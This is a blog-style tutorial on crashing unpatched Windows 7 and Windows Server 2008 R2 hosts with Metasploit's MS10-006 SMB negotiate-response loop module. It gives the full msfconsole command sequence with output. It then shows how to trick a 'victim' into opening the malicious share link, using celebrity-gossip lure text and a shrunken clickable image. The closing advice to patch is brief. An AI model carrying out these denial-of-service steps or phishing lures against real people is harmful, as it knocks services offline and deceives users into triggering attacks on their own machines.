All the hacks using Metasploits talks about Windows XP, Windows 2003 server and older version of Windows which are being phased out slowly. More and more people are using Windows 7 as their Operating System and Windows 2008 R2 server for corporate purposes. The purpose of this guide is to show how you can use a simple smb infinite loop vulnerability to crash and do (DOS) Denial-of-service attack on Windows 2008 R2 server and Windows 7 using Metasploits. I’ve tested this with a Windows 7 fresh install (no patch or service packs) and Windows 2008 R2 (no patch and service packs) and in both cases they stopped responding completely. You don’t even get to click anything. The only way I could get back into Windows is by doing a hard reset (press Power Key and reboot).
Now the main problem is most people plug in their Windows 7 into Internet and update with patches and service packs. But many many organizations just lock down their server which got no Internet connectivity and or stop it from updating as some updates requires a reboot. In production environment, rebooting a critical server might cause service interruption. But the way I understand it, if you don’t have enough time to patch your server and desktops, you are leaving them exposed with vulnerability and leaving them wide open, in other words you’re inviting remote hacks into your vulnerable system.[toc]
(DOS) Denial-of-service attack on Windows 2008 R2 server and Windows 7 with Metasploits
In this guide, I will demonstrate how to exploit Windows 7 and perform (DOS) Denial-of-service attack on Windows 2008 R2 server who didn’t apply MS10-006 (Vulnerabilities in SMB Client Could Allow Remote Code Execution (978251) patch. According to Microsoft this affects the following unpatched systems:
- Microsoft Windows 2000,
- Windows XP,
- Windows Server 2003,
- Windows 7, and
- Windows Server 2008 R2,
It is rated Important for
- Windows Vista and
- Windows Server 2008
WOHAA, that’s like everything except Windows NT, ME, 95 and 3.1!!! So if your target hasn’t patched this long lasting issue maybe they should get a taste of it.
This vulnerability could allow remote code execution if an attacker sent a specially crafted SMB response to a client-initiated SMB request. To exploit these vulnerabilities, an attacker must convince the user to initiate an SMB connection to a malicious SMB server. More technical jargon’s here: MS10-006
In case your target is Windows 2003, you should check (DOS) Denial-of-service attack on Windows 2003 with Metasploits guide. If you have issues starting or want to start Metasploits at system start-up (often a good idea when you’re using it heavily) you might also try to read other guides like start Metasploits framework.
If you’re not familiar with Metasploits you should read the first section from (DOS) Denial-of-service attack on Windows 2003 with Metasploits guide. This is a particularly good one as it explains what Metasploits is and how you can use it efficiently.
Now let’s start with the guide.
If you don’t have PostgreSQL and Metasploits running already you need to start it. I suggest you just enable postgresql and Metasploits framework at start-up so that you don’t have to type same commands over and over again. As you can see I am running Kali Linux (v1.0.6) and following is how you run Metasploits from command line.
root@kali:~# service postgresql start [ ok ] Starting PostgreSQL 9.1 database server: main. root@kali:~# service metasploits start [ ok ] Starting Metasploits rpc server: prosvc. [ ok ] Starting Metasploits web server: thin. [ ok ] Starting Metasploits worker: worker.
root@kali:~# msfconsole [*] The initial module cache will be built in the background, this can take 2-5 minutes... +-------------------------------------------------------+ | Metasploits by Rapid7 | +---------------------------+---------------------------+ | __________________ | | | ==c(______(o(______(_() | |""""""""""""|======[*** | | )= | | EXPLOIT | | // \ | |____________________ | | // \ | |==[msf >]============ | | // \ | |______________________ | | // RECON \ | (@)(@)(@)(@)(@)(@)(@)/ | | // \ | ********************* | +---------------------------+---------------------------+ | o O o | '///'/ | | o O | )======( | | o | .' LOOT '. | | |^^^^^^^^^^^^^^|l___ | / _||__ | | | PAYLOAD |""___, | / (_||_ | | |________________|__|)__| | | __||_) | | | |(@)(@)"""**|(@)(@)**|(@) | " || " | | = = = = = = = = = = = = | '--------------' | +---------------------------+---------------------------+ Tired of typing 'set RHOSTS'? Click & pwn with Metasploits Pro -- type 'go_pro' to launch it now. =[ Metasploits v4.7.0-2013082802 [core:4.7 api:1.0] + -- --=[ 1161 exploits - 641 auxiliary - 180 post + -- --=[ 310 payloads - 30 encoders - 8 nops msf > msf >
Now I have my
msfconsole up and running. Let’s actually load the module that we are going to use in this tutorial.
Load smb loop module
Type in the following command in red to load the module.
msf > use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop msf auxiliary(ms10_006_negotiate_response_loop) >
As you can see from the screen-shot below, you can type in use auxiliary/dos/windows/smb/ and press TAB key to show different modules. We are choosing the one which we will demonstrate here.
If you type in the following info command, it will show you more details on the module. Try typing in info followed by one module at a time to get info on each available hacks. Soon you’ll get the idea on which one does what and affects which system. Following is an example command using info.
msf > info auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
Once you’re ready type in the following to use the hack:
msf > use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
Settings options for module
Now that we are fairly confident on what this module does (by using info) we are going to check what options it’s got.
Type in the following command to find details.
msf auxiliary(ms10_006_negotiate_response_loop) > show options
As we can see, we only need to set SVRHOST, which is our own IP Address (my attacking machine’s IP).
My test machines IP was 10.10.10.12, so now I’ll set that.
msf auxiliary(ms10_006_negotiate_response_loop) > set SRVHOST 10.10.10.12 SRVHOST => 10.10.10.12
As you can see from the screenshot, I’ve used show options twice, before and after using set SRVHOST command. Output shows I managed to set SRVHOST properly.
Run Metasploits exploit
Now that everything looks good, we run our Metasploits exploit..
msf auxiliary(ms10_006_negotiate_response_loop) > exploit [*] Starting the malicious SMB service... [*] To trigger, the vulnerable client should try to access: \10.10.10.12SharedAnything [*] Server started. . . . <after my test Windows 7 and Windows 2008 R2 both crashed> . clear^C[-] Auxiliary interrupted by the console user [*] Server stopped. [*] Auxiliary module execution completed msf auxiliary(ms10_006_negotiate_response_loop) > exit root@kali:~# clear
Once you’ve run the exploit, it will generate a shared folder link that you need send to your victim. As my own IP was 10.10.10.12, it created \10.10.10.12SharedAnything shared folder.
Now we have exploit running, and we have a victim. But how to send the link so that we know for sure the victim will click on the link? Are you going to send him a boring and obvious link like \10.10.10.12SharedAnything this? Maybe not! So we need to generate a nice looking link with attractive text on it.
How about this?
Latest news on Kim Kardashian selfie …wooohooo
So I embedded the link on text in the example here. That might work, if your target is into Kim Kardashian.
Or maybe he’s into something different. Then just rewrite the line with something like this:
See that I embedded the link into the picture and made the picture really really small. That means the victim MUST click on it to enlarge it, and once they’ve done that, you’ve already DOS’d them.
Fairly easy to do (DOS) Denial-of-service attack on Windows 2008 R2 and Windows 7 using Metasploits in Kali Linux like this and at the same time it’s a bit scary that how easy it was to do it. Hope you found it useful and informative. Patch your server, desktop and stay away from these issues.
- URL: http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html
Thanks for reading. Please share.